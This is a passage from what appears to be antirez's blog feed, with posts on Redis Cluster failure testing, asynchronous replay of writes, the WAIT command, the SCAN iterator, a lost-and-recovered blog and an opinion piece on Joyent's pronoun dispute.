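# ...produce exactly the same final state.
assert r.smembers("set:1") == r.smembers("set:2")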

Because of this observation, and since Redis instances get asynchronous acknowledges from slaves about how much data was processed, it is possible for partitioned masters to remember commands sent by clients that are still not acknowledged by all the replicas.

This trick is able to improve data safety in a way similar to AP systems, but while AP systems merge values, Redis Cluster would replay commands from clients instead.

I proposed this idea in a blog post [3] some time ago, however here is a practical example of what would happen implementing it in a future version of Redis Cluster:

- A master gets partitioned away with clients.
- Clients write to the master for node-timeout time.
- The master starts returning errors.
- In the majority side, a slave is elected as the new master.
- When the old master rejoins it is reconfigured as a replica of the new master.

So far this is the description of what happens currently. With command replaying, what would happen is that all the writes not acknowledged, from the time the partition is created to the time the master starts to reply with errors, are accumulated. When the partition heals, as part of turning the old master into a slave, the old master would connect with the new master, and re-play the accumulated stream of commands.

How is all this tested?
===

Some time ago I wrote about what I use in order to test Redis Cluster [4]. The most valuable tool I found so far is a simple consistency-test that is part of the redis-rb-cluster project [5] (a Ruby Redis Cluster client). Basically stress testing the system is as simple as keeping the consistency test running, while simulating different partitions, restarts, and other failures in the cluster.

This test was so useful and is so simple to run that I’m actually starting to think that everybody running a distributed database in production, whether it is Cassandra or Zookeeper or Redis or whatever else, should keep a similar test running against the production system as a way to monitor what is happening.

Such tests are lightweight to run, they can be made to just set a few keys per second. However they can easily detect issues with the implementation or other unexpected consistency issues. Especially systems merging data that are at the same time always available, such as AP systems, have the tendency to “mask” bugs: it takes some luck to discover a consistency leak in real data sets. With a simple consistency test running instead, it is possible to monitor how the system is behaving.

The following for example is the output of consistency-test.rb running against my testing environment:

27523967 R (7187 err) | 27523968 W (7186 err) | 12 noack |

So I know that I read/wrote 27 million times during my testing, and 12 writes that received no acknowledge were actually materialized inside the database.

Notes:

[1] https://groups.google.com/d/msg/redis-db/2laQRKBKkYg/ssaiQLhasNkJ
[2] http://antirez.com/news/67
[3] http://antirez.com/news/68
[4] http://antirez.com/news/69
[5] https://github.com/antirez/redis-rb-cluster Comments]]>
http://antirez.com/news/70
Some fun with Redis Cluster testing http://antirez.com/news/69 http://antirez.com/news/69 Wed, 18 Dec 2013 15:32:21 +0000
In order to perform some testing I assembled an environment like that:

* Hardware: 6 real computers: 2 MacBook Pro, 2 MacBook Air, 1 Linux desktop, 1 tiny Linux laptop called EEEpc running with a single core at 800MHz.

* Network: the six nodes were wired to the same network in different ways. Two nodes were connected via ethernet, and four over wifi, with different access points. Basically there were three groups. The computers connected via ethernet had 0.3 milliseconds RTT, two other computers connected with a near access point were at around 5 milliseconds, and another group of two with another access point was not very reliable: sometimes packets were lost, with latency spikes of 300-1000 milliseconds.

During the simulation every computer ran Partitions.tcl (http://github.com/antirez/partitions) in order to simulate network partitions three times per minute, lasting an average of 10 seconds. Redis Cluster was configured to detect a failure after 500 milliseconds, so these settings are able to trigger a number of failover procedures.

Every computer ran the following:

Computer 1 and 2: Redis cluster node + Partitions.tcl + 1 client
Computer 3 to 6: Redis cluster node + Partitions.tcl

The cluster was configured to have three masters and three slaves in total.

As client software I ran the cluster consistency test that is shipped with redis-rb-cluster (http://github.com/antirez/redis-rb-cluster), which performs atomic counter increments remembering the value client side, to detect both lost writes and non acknowledged writes that were actually accepted by the cluster.
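
The idea behind the test can be sketched like this (a simplified Python rendition of what the Ruby test does, with invented variable names, not the actual code):

import redis

r = redis.Redis()          # the real test uses a cluster-aware client
expected = {}              # client-side memory of every counter's value
lost = unacked_written = 0

for i in range(1000000):
    key = "counter:%d" % (i % 100)
    try:
        val = r.incr(key)
        expected[key] = expected.get(key, 0) + 1
        if val < expected[key]:
            lost += expected[key] - val       # acknowledged writes vanished
            expected[key] = val
        elif val > expected[key]:
            # Writes that errored client-side were actually applied.
            unacked_written += val - expected[key]
            expected[key] = val
    except redis.ConnectionError:
        pass  # outcome unknown: may surface later as "unacked but written"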

I left the simulation running for about 24 hours, however there were moments where the cluster was completely down due to too many nodes being down.

The bugs
===

The first thing that happened in the simulation was a big number of node crashes… the simulation was able to trigger bugs that I did not notice in the past. Also there was obvious misbehavior due to the fact that one node, the EEEpc one, was running a Redis server compiled with a 32 bit target. So in the first part of the simulation I just fixed bugs:

7a666ac Cluster: set n->slaves to NULL in clusterNodeResetSlaves().
fda91db Cluster: check link is valid before sending UPDATE.
f57bb36 Cluster: initialize todo_before_sleep flags to 0.
c70c0c6 Cluster: use proper type mstime_t for ping delay var.
7c1cbdc Cluster: use an hardcoded 60 sec timeout in redis-trib connections.
47815d3 Fixed clearNodeFailureIfNeeded() time type to mstime_t.
e88e6a6 Cluster: use long long for timestamps in clusterGenNodesDescription().

The above commits made yesterday are a mix of bugs reported by valgrind (for some part of the simulation there were nodes running over valgrind), crashes, and misbehavior of the 32 bit instance.

After all the above fixes I left the simulation running for many hours without being able to trigger any crash. Basically the simulation “paid for itself” just with this bug fixing activity… more minor bugs that I’ve yet to fix were found during the simulation.

Behavior under partition
===

One of the important goals of this simulation was to test how Redis Cluster performed under partitions. While Redis Cluster does not feature strong consistency, it is designed in order to minimize write loss under some very common failure modes, and to contain data loss within a given max window under other failure modes.

Understanding how it works and its failure modes is simple, because the way Redis Cluster itself works is simple to understand and predict. The system is just composed of different master instances handling a subset of keys each. Every master has from 0 to N replicas. In the specific case of the simulation every master had just one replica.

The most important aspect regarding safety and consistency of data is the failover procedure, that is executed as follows:

* A master must be detected as failing, according to the configured “node timeout”. I used 500 milliseconds as node timeout. However a single node cannot start a failover if it just detects a master is down. It must receive acknowledgements from the majority of the master nodes in order to flag the node as failing.
* Every slave that flagged a node as failing will try to be elected to perform the failover. Here we use the Raft protocol election step, so that only a single slave will be able to get elected for a given epoch. The epoch will be used in order to version the new configuration of the cluster for the set of slots served by the old master.

Once a slave performs the failover it reclaims the slots served by its master, and propagates the information ASAP. Other nodes that have an old configuration are updated by the cluster at a later time if they were not reachable when the failover happened.

Since the replication is asynchronous, and when a master fails we pick a slave that may not have all the master data, there are obvious failure modes where writes are lost. However Redis Cluster tries to do things in order to avoid situations where, for example, a client keeps writing forever to a master that is partitioned away and was already failed over in the majority side.

So these are the main precautions used by Redis Cluster to limit lost writes:

1) Not every slave is a candidate for election. If a slave detects its data is too old, it will not try to get elected. In practical terms this means that the cluster does not recover in the case where none of the slaves of a master were able to talk with the master for a long time, the master fails, and the slaves are available but have very stale data.
2) If a master is isolated in the minority side of the cluster, that means, it senses the majority of the other masters are not reachable, it stops accepting writes.

There are still things to improve in the heuristics Redis Cluster uses to limit data loss. For example, currently it does not use the replication offset in order to give an advantage to the slave with the freshest version of the data, but only the “disconnection time” from the master. This will be implemented in the next days.

However the point was to test how these mechanisms worked in the practice, and also to have a way to measure if further improvements will lead to less data loss.

So these are the results obtained in this first test:

* 1000 failovers
* 8.5 million writes performed by each client
* The system lost 2000 writes.
* The system retained 800 not acknowledged writes.

The amount of lost writes may appear extremely low considering the number of failovers performed. However note that the test program run by the client was conceived to write to different keys, so it was very easy, when partitioned into a minority of masters, for the client to hit a hash slot not served by the reachable masters. This resulted in waiting for the timeout to occur before the next write. However writing to multiple keys is actually the most common case for real clients.

Impressions
===

Running this test was pretty interesting from the point of view of the paradigm shift from Redis to Redis Cluster.
When I started the test there were the bugs mentioned above still to fix, so instances crashed from time to time, yet the client was almost always able to write (unless there was a partition that resulted in the cluster not being available). This is an obvious result of running a cluster, but as I’m used to the different availability pattern that is currently the norm with Redis, this was pretty interesting to touch first hand.

Another positive result was that the system worked as expected in many ways, for example the nodes always agreed about the configuration when the partitions healed, and there was never a time in which, with no partitions in place, the client was unable to reach all the hash slots and reported errors.

The failure detection appeared to be robust enough: the computer connected via the very high latency network appeared, from time to time, to be down to a single node, but that was not enough to get the agreement from the other nodes, avoiding a number of useless failover procedures.

At the same time I noticed a number of little issues that must be fixed. For example at some point there was a power outage and the router rebooted, causing many nodes to change address. There is a built-in feature in Redis Cluster so that the cluster reconfigures itself automatically with the new addresses, as long as there is a node that did not change address, assuming every node can reach it.
This system worked only half-way, and I noticed that indeed the implementation was not yet complete.

Future work
===

This is just an initial test, and this and other tests will need to become the norm in the process of testing Redis Cluster.
The first step will be to create a Redis Cluster testing environment that will be shipped with the system and that the user can run, so it is possible that the cluster will get a feature to simulate partitions easily.

Another thing that is worthwhile with the current test setup using Partitions.tcl is the ability of the test client, and of Partitions.tcl itself, to log events. For example with a log of partitions and data loss events that has accurate enough timestamps, it is possible to correlate data loss events with partition setups.

If you are interested in playing with Redis Cluster you can follow the Redis Cluster tutorial here: http://redis.io/topics/cluster-tutorial Comments]]>
http://antirez.com/news/69
Redis as AP system, reloaded http://antirez.com/news/68 http://antirez.com/news/68 Wed, 11 Dec 2013 21:19:21 +0000
At the end of the work day I was reading about Redis as an AP system and merge operations on Twitter. At the same time I was having a private email exchange with Alexis Richardson (of RabbitMQ, and also my boss). At some point Alexis proposed that perhaps a way to improve safety was to asynchronously ACK the client about which commands were actually not received, so that the client could retry. This seemed like a lot of effort on the client side, but it totally opened my view on the matter.

So the idea is: we can't go for synchronous replication, but we do get ACKs from the replicas, asynchronous ACKs specifically.
What about retaining all the writes not acknowledged in a buffer, and "re-playing" them to the current master when the partition heals?
The window for which we need to keep the log is very small if the ACKs are frequent enough (currently the frequency is 1 per second, but it could easily be higher).
If we give up Availability after N times the window we can say: ok, no more room, we now start to reply with errors to queries.

The HUGE difference with this approach is that it works regardless of the size of the values. There are also semantical differences, since the stream of operations is preserved instead of the value itself, so there is more context. Think for example about INCR.

Of course this would not work for everything, but one could mark in the command table which commands to replay and which to discard. SADD is an example of a perfect command since the order of operations does not matter. DEL is likely something to avoid replaying. And so forth. In turn, if we replay against the wrong (stale) master, it will accumulate the commands in its own buffer, and so forth. Details may vary, but this is the first thing that really makes a difference.
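
A minimal sketch of how such a buffer could look (invented names, written in Python rather than as actual Redis internals; the command classification is just an example):

REPLAY  = {"SADD", "INCR", "RPUSH"}   # order-insensitive: safe to re-play
DISCARD = {"DEL"}                     # better not to re-play these

class ReplayBuffer:
    def __init__(self, max_commands=10000):
        self.pending = []              # writes not yet acked by replicas
        self.max_commands = max_commands

    def on_write(self, cmd, *args):
        if cmd in DISCARD:
            return
        if len(self.pending) >= self.max_commands:
            raise RuntimeError("no more room: start replying with errors")
        if cmd in REPLAY:
            self.pending.append((cmd, args))

    def on_replica_ack(self, acked_count):
        # Replicas acknowledged the oldest acked_count writes: forget them.
        self.pending = self.pending[acked_count:]

    def replay_to(self, master):
        # When the partition heals, re-play what was never acknowledged.
        for cmd, args in self.pending:
            master.execute_command(cmd, *args)
        self.pending = []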

Probably many of you that are into eventually consistent databases already know about the log VS merge strategies, but I had to re-invent the wheel as I was not aware of them. This is the kind of feedback I expected in the Redis thread that I did not receive.

Another cool thing about this approach is that it's pretty opt-in, it can be just a state of the connection. Send a command and the connection becomes of the "safe" type, so all the commands sent will be retained and replayed if not acknowledged, and so forth.

This is not going to be in the first version of Redis Cluster as I'm more happy to ship the current design ASAP, but it is a solid incremental idea that could be applied later, so a little actual result in the evolution of the design. Comments]]>
http://antirez.com/news/68
The Redis criticism thread http://antirez.com/news/67 http://antirez.com/news/67 Mon, 09 Dec 2013 23:53:03 +0000
https://groups.google.com/forum/#!topic/redis-db/Oazt2k7Lzz4

The thread has reached 89 posts so far, probably one of the biggest threads in the history of the Redis google group.
The main idea was that critiques are a mix of pointless attacks and truth, so extracting the truth from critiques can be a good exercise: it means getting some seed ideas for future improvements from the part of the population that is not using, or is not happy with, your system.

There were a lot of possible arguments: threading, persistence model, API, security, and so forth, however the argument that received the most attention was the Redis Cluster design and its tradeoffs. There are people that are not convinced by the proposed design, since it provides neither strong Consistency nor Availability (the “C” and “A” of CAP, not any random consistency or availability).

Instead it only provides some form of weaker consistency and some failure resistance. In this blog post I want to clarify why this is in my opinion the right choice for Redis.

Strong consistency requires synchronous replication, and depending on the failure models you want to handle, it also requires fsyncing data on disk at every write, in order to cover failures like all the nodes in a single data center rebooting for a power outage.
Redis is what it is because of its performance and latency characteristics, so a model like the above would not be Redis.

So Redis Cluster trades Consistency for performance. The tradeoff is that there are well defined failure modes where it is possible to lose writes, however the system is designed in order to minimize lost writes under certain assumptions.

The other property we give away is availability, because being available means, in order to have a decent consistency story, merging values when partitions heal. The Redis data model is not merge-friendly. Redis uses the fact that data representation is in memory to get an advantage, and exports rich data structures to the user that have practically no limits in the size of every single value, if not the available memory. So there are Redis deployments with just a few keys, with sorted set values of many millions of elements, to implement leaderboards of Facebook games, and stuff like that.

Merging huge and complex values is extremely hard and not very practical. Implementing the values in a way that makes merging more manageable would instead mean giving up the current performance entirely.

So we trade Availability for a more powerful data model. We still have some degree of resistance to failures. Nodes can stop working and partitions can happen, and as long as there is the majority of master nodes up and at least a replica for each hash slot, the system is able to accept queries from clients.

I believe this is a perfectly acceptable design, able to provide great performance with consistency and availability guarantees that are reasonable for many classes of applications. To get an idea about how it is possible to lose writes you can read the Redis Cluster tutorial here: http://redis.io/topics/cluster-tutorial

Note that in the meantime Redis unstable got an implementation of synchronous replication. It is not capable of providing strong consistency alone, but it is able to improve the consistency guarantees that the system provides for certain writes (fewer and harder to trigger failure modes). However I believe that most users want Redis for very high loads, so this feature will likely not see much use.

Why Redis Cluster?
===

The real goal of Redis Cluster is not to provide the coolest consistent or available system; its goal is to provide what Redis is, but distributed across many nodes with *automatic sharding*. That was the real trigger: users can’t reinvent client-side sharding again and again, something that can do this for you is very useful, especially if it is designed in a way that 100 nodes will provide the performance of a single instance multiplied by 100.

This is the main reason I want to see it working and deployed, because I believe it can make a huge difference for the Redis users.
Being a distributed system, it should also be operationally friendly (that was another design goal), provide some resistance to failures, and have easy to predict failure modes. So consistency and availability are automatically concerns, and a huge part of the tradeoffs to make, of course.

I’m excited about Redis Cluster. I truly believe it will benefit many users.

Redis became what it is, this strange tool that many developers learned to live with and to solve problems with, because I tried to never be dogmatic about the development process and the tradeoffs, sometimes extreme, to take.
For example the fact that Redis is probably the only top-used database system currently developed mostly by a single individual (at our max we were Pieter half-time and I full-time) is the result of these choices: I’m not magic, the only way to do it is to realize your limits and design and plan for them.

So, as long as there are users doing good work with it, the Redis experiment is here to stay. Once the thread is over I’ll restart my usual routine: grab a coffee in the morning, sit in front of my computer, and do the only thing I’m really good at: write some code.

Thanks to everybody that took part in the thread. I probably would not do it again, since honestly it was more stressful than useful, however sometimes odd things must be tried, and it feels great not to fear the critiques.

Write code and be free. Comments]]>
http://antirez.com/news/67
WAIT: synchronous replication for Redis http://antirez.com/news/66 http://antirez.com/news/66 Thu, 05 Dec 2013 09:50:33 +0000
The feature was extremely easy to implement because of previous work. WAIT was basically a direct consequence of the new Redis replication design (that started with Redis 2.8). The feature itself is in a form that respects the design of Redis, so it is relatively different from other implementations of synchronous replication, both at the API level, and from the point of view of the degree of consistency it is able to ensure.

Replication: synchronous or not?
===

Replication is one of the main concepts of distributed systems. For some state to be durable even when processes fail or when there are network partitions making processes unable to communicate, we are forced to use a simple but effective strategy, that is, to keep the same information “replicated” across different processes (database nodes).

Every kind of system featuring strong consistency will use a form of replication called synchronous replication. It means that before some new data is considered “committed”, a node requires acknowledgment from other nodes that the information was received. The node initially proposing the new state, when the acknowledgment is received, will consider the information committed and will reply to the client that everything went ok.

There is a price to pay for this safety: latency. Systems implementing strong consistency are unable to reply to the client before receiving enough acknowledgments. How many acks are “enough”? This depends on the kind of system you are designing. For example in the case of strongly consistent systems that are available as long as the majority of nodes are working, the majority of the nodes should reply back before some data is considered to be committed. The result is that the latency is bound by the node that replies as the (N/2+1)th one. Slower nodes can be ignored once the majority is reached.

Asynchronous replication
===

This is why asynchronous replication exists: in this alternative model we reply to the client confirming its write BEFORE we get acknowledgments from other nodes.
If you think about it from the point of view of CAP, it is like the node *pretends* that there is a partition and can’t talk with the other nodes. The information will eventually be replicated at a later time, exactly like an eventually consistent DB would do during a partition. Usually this later time will be a few hundred microseconds later, but if the node receiving the write fails after it already sent the reply to the client, but before propagating the write, the write is lost forever even if it was acknowledged.

Redis uses asynchronous replication by default: Redis is designed for performance and low, easy to predict latency. However, if possible, it is nice for a system to be able to adapt its consistency guarantees depending on the kind of write, so some form of synchronous replication could be handy even for Redis.

WAIT: call me synchronous if you want.
===

The way I depicted synchronous replication above makes it sound simpler than it actually is.

The reality is that usually synchronous replication is “transactional”, so that a write is propagated to the majority of nodes (or *all* the nodes with some older algorithms), or to none. So, in one way or the other, not only must the node proposing the state change wait for a reply from the majority, but the other nodes also need to wait for the proposing node to consider the operation committed in order to, in turn, commit the change. Basically replicas require, one way or the other, a mechanism to collect the write without applying it.

This means that nothing happens during this process, everything is blocked for the current operation, and only later can you process a new one, and so forth.

Because synchronous replication can be very costly, maybe we can do with a bit less? We want a way to make sure some write propagated across the replicas, but at the same time we want other clients to go at light speed as usual, sending commands and receiving replies. Clients waiting in a synchronous write should never block any other client doing other synchronous or non-synchronous work.

There is a tradeoff you can take: WAIT does not allow rolling back an operation that was not propagated to enough slaves. It merely offers a way to inform the client about what happened.
The information, specifically, is the number of replicas that your write was able to reach, all this encapsulated into a simple to use blocking command.

This is how it works:

redis 127.0.0.1:9999> set foo bar
OK
redis 127.0.0.1:9999> incr mycounter
(integer) 1
redis 127.0.0.1:9999> wait 5 100
(integer) 7

Basically you can send any number of commands, and they’ll be executed, and replicated as usual.
As soon as you call WAIT however, the client stops until all the writes above are successfully replicated to the specified number of replicas (5 in the example), unless the timeout is reached (100 milliseconds in the example).

Once one of the two limits is reached, that is, the master replicated to 5 replicas, or the timeout was reached, the command returns, sending as reply the number of replicas reached. If the return value is less than the replicas we specified, the request timed out, otherwise the above commands were successfully replicated to the specified number of replicas.

In practical terms this means that you have to deal with the condition in which the command was accepted by fewer replicas than you specified, within the amount of time you specified. More about that later.
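
For example, with redis-py (which exposes the command as a wait() method; this assumes a server recent enough to support WAIT) the same pattern looks like this:

import redis

r = redis.Redis()
r.set("foo", "bar")

# Block until 2 replicas acked the writes above, or 100 ms elapsed.
acked = r.wait(2, 100)
if acked < 2:
    print("warning: write reached only %d replicas" % acked)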

How does it work?
===

The WAIT implementation is surprisingly simple. The first thing I did was to take the blocking code of BLPOP & other similar operations and make it a generic primitive of Redis internal API, so now implementing blocking commands is much simpler.

The rest of the implementation was trivial because 2.8 introduced the concept of master replication offset, that is, a global offset that we increment every time we send something to the slaves. All the slaves receive exactly the same stream of data, and remember the offset processed so far as well.

This is very useful for partial resynchronization as you can guess, but moreover slaves acknowledge to the master, every second, the amount of replication offset they processed so far, so the master has some idea of how much they processed.

Every second sucks, right? We can’t base WAIT on information available every second. So when WAIT is used by a client, it sets a flag, so that all the WAIT callers in a given event loop iteration will be grouped together, and before entering the event loop again we send a REPLCONF GETACK command into the replication stream. Slaves will reply ASAP with a new ACK.

As soon as the ACKs received from the slaves are enough to unblock some client, we do it. Otherwise we unblock the client on timeout.

Not considering the refactoring needed for the blocking operations, which is technically not part of the WAIT implementation, all the code is like 170 lines, so it is very easy to understand and modify, with almost zero effects on the rest of the code base.

Living with the indetermination
===

WAIT does not offer any “transactional” feature to commit a write to N nodes or to none, but provides information about the degree of durability we achieved with our write, in an easy to use form that does not slow down the operations of other clients.

How does this improve consistency in Redis land? Let’s look at the following pseudo code:

def save_payment(payment_id)
  redis.set(payment_id, "confirmed")
end

We can imagine that the function save_payment is called every time a user pays for something, and we want to store this information in our database. Now imagine that there are a number of clients processing payments, so the function above gets called again and again.

In Redis 2.6 if there was an issue communicating with the replicas, while running the above code, it was impossible to sense the problem in time. The master failing could result in replicas missing a number of writes.

In Redis 2.8 this was improved by providing options to stop accepting writes if there are problems communicating with the replicas. In this setup Redis can check if there are at least N replicas that appear to be alive (pinging back the master). With this option we improved the consistency guarantees a bit: now there is a maximum window during which it is possible to write to a master that is not backed by enough replicas.

With WAIT we can finally improve considerably how safe our writes are, since I can modify the code in the following way:

def save_payment(payment_id)
  redis.set(payment_id, "confirmed")
  if redis.wait(3,1000) >= 3 then
    return true
  else
    return false
  end
end

In the above version of the program we finally gained some information about what happened to the write. Even if we actually did not change the outcome of the write, we are now able to report this information back to the caller.
However what to do if wait returns less than 3? Maybe we could try to revert our write sending redis.del(payment_id)? Or we could try to set the value again in order to succeed the next time?

With the above code we are exposing our system to too much trouble. In a given moment, if only two slaves are accepting writes, all the transactions will have to deal with this inconsistency, however it is handled. There is a better thing we can do: modify the code in a way so that it does not actually set a value, but instead appends events about the transaction to a Redis list:

def save_payment(payment_id)
  redis.rpush(payment_id, "in progress") # Return false on exception
  if redis.wait(3,1000) >= 3 then
    redis.rpush(payment_id, "confirmed") # Return false on exception
    if redis.wait(3,1000) >= 3 then
      return true
    else
      redis.rpush(payment_id, "cancelled")
      return false
    end
  else
    return false
  end
end

Here we push an “in progress” state into the list for this payment ID before actually confirming it. If we can’t reach enough replicas we abort the payment, and it will not have the “confirmed” element. In this way, if there are only two replicas getting writes, the transactions will fail one after the other. The only clients that will have to deal with inconsistencies are the clients that are able to propagate “in progress” to 3 or more replicas but are not able to do the same with the “confirmed” write. In the above code we try to deal with this issue with a best-effort “cancelled” write, however there is still the possibility of a race condition:

1) We send “in progress”
2) We send “confirmed”, it only reaches 2 slaves.
3) We send “cancelled” but at this point the master crashed and a failover elected one of the slaves.

So in the above case we returned a failed transaction while actually the “confirmed” state was written.

You can do different things to deal better with this kind of issue: mark the transaction as “broken” in a strongly consistent and highly available system like Zookeeper, write a log in the local client, put it in the hands of a message queue that is designed with some redundancy, and so forth.

Synchronous replication and failover: two close friends
===

Synchronous replication is important per se because it means there are N copies of the data around; however to really exploit the improved data safety, we need to make sure that when a master node fails and a slave is elected, we get the best slave.

The new implementation of Sentinel already elects the slave with the best replication offset available, assuming it publishes its replication offset via INFO (that is, it must be Redis 2.8 or greater), so a good setup can be to run an odd number of Redis nodes, with a Redis Sentinel installed on every node, and use synchronous replication to write to the majority of nodes. As long as the majority of the nodes is available, a Sentinel will be able to win the election and promote the slave with the most updated data.

Redis cluster is currently not able to elect the slave with the best replication offset, but will be able to do that before the stable release. It is also conceivable that Redis Cluster will have an option to only promote a slave if the majority of replicas for a given hash slot are reachable.

I just scratched the surface of synchronous replication, but I believe this is a building block that we Redis users will be able to exploit in the future to stretch Redis capabilities, covering new needs for which Redis was traditionally felt to be inadequate. Comments]]>
http://antirez.com/news/66
Blog lost and recovered in 30 minutes http://antirez.com/news/65 http://antirez.com/news/65 Mon, 02 Dec 2013 08:52:19 +0000
I just started a screen instance, and ran something like ./redis-server --port 10000. Since this is equivalent to an empty config file with just "port 10000" inside, I was running with no disk backing at all.

Since Redis very rarely crashes, guess what, after more than one year it was still running inside the screen session, and I totally forgot that it was running like that, while I was happily writing controversial posts in my blog. Yesterday my server was under attack. This caused a higher than normal load, and Linode rebooted the instance. As a result my blog was gone.

The good thing is that I recovered everything in about 30 minutes because simple systems are really better than complex systems when something bad happens. This blog is composed of posts that are just the verbatim dump of what I write in a text area. No formatting at all. Comments are handled by Disqus and the ID I submit is just the post ID.

All I had to do was to set up a new Redis server (this time with AOF enabled, daemonized, and with a proper configuration file) and search Google for the posts one after the other by URL (which is the same for all the posts, only the incremental ID changes). For every post I opened the Google cache of the post, selected the text, copied it, and submitted the new post.
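
For reference, the relevant part of such a configuration could look like this minimal sketch (the values are just examples, not my actual setup):

port 6379
daemonize yes
appendonly yes
appendfsync everysec
dir /var/lib/redis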

The only thing I lost are the post dates... I could fix them by modifying the blog code a bit to allow me to do this, but I'm not sure I'll be able to find the time.

Long story short, this is a trivial example, and a human error, but even in serious, well maintained systems shit happens, and when the architecture of something is simple, it is simpler to deal with even during failures.

Not to mention that now I know I don't have to enable backups as I can recover everything. No, just kidding. Comments]]>
http://antirez.com/news/65
The fight against sexism is not a free pass http://antirez.com/news/64 http://antirez.com/news/64 Sun, 01 Dec 2013 15:48:37 +0000
Basically the developer Ben Noordhuis rejected a pull request involving a change in the documentation to use gender-neutral form instead of “him”. Joyent replied with this incredible post: http://www.joyent.com/blog/the-power-of-a-pronoun.

In the blog post you can read:

“But while Isaac is a Joyent employee, Ben is not—and if he had been, he wouldn't be as of this morning: to reject a pull request that eliminates a gendered pronoun on the principle that pronouns should in fact be gendered would constitute a fireable offense for me and for Joyent.”

A few lines later you can read: “Indeed, one of the challenges of an open source project that depends on volunteer effort is dealing with assholes”

Maybe Joyent is thinking something like: you can’t go wrong if you fight sexism. Or something like that, as I can’t believe they had such a naive reaction. Really, we have 10k years of culture for a reason: to be able to discriminate more than that, it is not 2+2=4.

Probably Ben is not a sexist, maybe he simply believes that “him” does not make a difference in everyday sexism. Everybody has his own fight, and changing “him” is not Ben's fight, but possibly when Ben has to evaluate a female candidate, he will use a truly meritocratic meter and WILL NOT GIVE A FUCK about the gender, like he did when refusing the pull request.

You can’t bash people that don’t share your vision, and you can’t think that the fight against sexism is a free pass. Joyent, you are liable for your actions, and your actions violate more fundamental civil rights than you think.

But the most disturbing thing is that companies act like that because of fear: the fear of the reaction of people that believe the world is black or white, and that if you don't see it the same color they see it, you are to blame, you are to be crucified.
Finally Redis collections are iterable http://antirez.com/news/63 http://antirez.com/news/63 Sun, 27 Oct 2013 15:47:10 +0000
It is limited because it only allows accessing data in a natural way, that is, in a way that is obvious given the data structure. Sorted sets are easy to access by score ranges, hashes by field name, and so forth.
This API "way" has profound effects on what Redis is and how users organize data into it, because a data-obvious API means fast operations, less code and fewer bugs in the implementation, but especially it forces the application layer to make meaningful choices: the database as a system in which you are responsible for organizing data in a way that makes sense for your application, versus the database as a magical object where you put data inside, and it will fetch and organize the data for you in any format.

However most Redis data types, including the outer key-value shell if we want to consider it a data type for a moment (it is a dictionary after all), are collections of elements. The key-value space is a collection of keys mapped to values, as Sets are collections of unordered elements, and so forth.

In most application logic using Redis the idea is that you know what member is inside a collection, or at least you know what member you should test for existence. But life is not always that easy, and sometimes you need something more, that is, to scan the collection in order to retrieve all the elements inside. And yes, since this is a common need, we have commands like SMEMBERS or HGETALL, or even KEYS, in order to retrieve everything there is inside a collection, but those commands are always a last-resort kind of deal, because they are O(N) operations.

Is your collection very small? Fine, use SMEMBERS and you get Redis-like performance anyway. Is your collection big? Don't use O(N) commands except for "debugging" purposes. A popular example is the misused KEYS command, a source of trouble for non-experts, and a top hit among the Redis slow log entries.

Black holes
===

The problem is that, because of O(N) operations, Redis collections (excluding Sorted Sets, which can be accessed by rank, in ranges, and in many other different ways) tend to be black holes where you put things inside, and you can hardly explore them again.

And there are plenty of reasons to explore what is inside. For example garbage collection tasks, schema migration, or even fixing what is inside keys after an application bug corrupted some data.

What we really needed was an iterator. Pieter Noordhuis and I were very aware of this problem since the early days of Redis, but it was a major design challenge, because traditionally the deal is: you want a data structure to be iterable? Then it is going to be a sorted, tree-like data structure, with the concept of previous and next elements.

Instead most Redis data types are based on hash tables, and Redis hash tables are even of a most particular kind, as they automatically and incrementally resize, so sometimes you even have two tables at the same time, slowly exchanging elements from one to the other.

Hash tables are cool because they have good memory efficiency and the constant-time access property. What we use are power-of-two sized hash tables, with chaining for collision handling, and this has worked pretty well so far. An indirect indicator is that sorted sets, the only data structure we have that is based on a tree-like structure (skip lists), are measurably slower than the others once elements start to pile up. While log(N) is small, with millions of elements it starts to be a big enough number that the cache misses, summed together, make a difference.

There was no easy way to say goodbye to hash tables.

However eventually Pieter applied one of the most powerful weapons a designer has in his hands: sacrifice. He sent me a pull request for a new SCAN command.

The command was able to walk the key space incrementally, using a cursor that is returned to the user after every call to SCAN, so it is a completely stateless affair. It works something like this:

redis 127.0.0.1:6379> flushall
OK
redis 127.0.0.1:6379> debug populate 33
OK
redis 127.0.0.1:6379> scan 0
1) "52"
2) 1) "key:29"
2) "key:13"
3) "key:9"
4) "key:12"
5) "key:28"
6) "key:30"
7) "key:26"
8) "key:14"
9) "key:21"
10) "key:20"
redis 127.0.0.1:6379> scan 52
1) "9"
2) 1) "key:16"
2) "key:31"
3) "key:3"
4) "key:0"
5) "key:32"
6) "key:17"
7) "key:24"
8) "key:8"
9) "key:15"
10) "key:11"

… and so forth until the returned cursor is 0 again …

This is possible because SCAN does not make big promises, hence the sacrifice: it only guarantees to return, at least one time, all the elements that are in the collection from the start to the end of the iteration.

This means, for example, that:

1) Elements may be returned multiple times.
2) Elements added during the iteration may be returned, or not, at random.

It turns out that this is a perfectly valid compromise, and that at the application level you can almost always do what is needed to play well with these properties. Sometimes the operation you are performing on every element is simply safe to re-apply; other times you can just put a flag in your (for example) Hash in order to mark it as processed, or perhaps a timestamp, and so forth.
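
As an illustration, this is a minimal sketch of such a loop using the redis-py client (process_key() is an invented name; the point is that it must be safe to call it twice for the same key):

import redis

r = redis.StrictRedis(host="127.0.0.1", port=6379)

def process_key(key):
    # Idempotent operation: applying it twice to the same key is harmless.
    r.expire(key, 3600)

cursor = 0
while True:
    cursor, keys = r.scan(cursor)
    for key in keys:
        process_key(key)   # may be called more than once per key
    if cursor == 0:        # iteration complete when the cursor is 0 again
        break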

Eventually merged
===

Pieter did an excellent work, but the pull request remained pending forever (more than one year), because it relied on an implementation that is complex to understand. Basically, in order to guarantee the previous properties with tables that can change from one SCAN call to the next, Pieter used a cursor that is incremented by inverting its bits, in order to count starting from the most significant bits first. This is why in the example you see the returned cursor jumping forward and backward.

This has different advantages, including the fact that it returns a small number of duplicates when possible (by checking fewer slots than a more naive implementation would). Eventually I studied his code and tried to find a simpler algorithm with the same properties, without success, so what I did was to document the algorithm. You can read the description in the dict.c file: https://github.com/antirez/redis/blob/unstable/src/dict.c#L663

After you do some whiteboard reasoning, it is not too hard to see how it works, but it is not trivial either. However, it definitely works very well.
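
To give an idea of the trick, here is a sketch (my illustration, not the actual dict.c code) of a cursor that is incremented on the most significant bits first, for a table whose size is 2^bits:

def reverse_bits(v, bits):
    # Mirror the lowest `bits` bits of v.
    r = 0
    for i in range(bits):
        r = (r << 1) | ((v >> i) & 1)
    return r

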